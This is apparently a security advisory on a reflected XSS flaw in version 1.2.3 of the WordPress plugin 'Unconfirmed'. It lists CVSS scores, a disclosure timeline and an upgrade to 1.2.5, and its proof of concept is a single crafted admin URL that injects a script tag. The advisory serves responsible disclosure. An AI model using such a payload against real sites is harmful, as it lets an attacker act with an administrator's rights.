Advisory:

XSS in Unconfirmed 1.2.3

Vulnerability

Last revised:

This plugin is vulnerable to a reflected XSS attack. An attacker able to convince a logged in admin to visit a particular URL will be able to do anything an admin can do.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Log in as an admin on a multisite installation, visit this URL (replacing localhost with the appropriate domain name):

http://localhost/wp-admin/network/users.php?page=unconfirmed&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

Advisory timeline

  • 2014-04-09: Discovered.
  • 2014-04-10: Reported to plugins@wordpress.org and the author.
  • 2014-04-10: Update released.

Mitigation/further actions

Upgrade to version 1.2.5.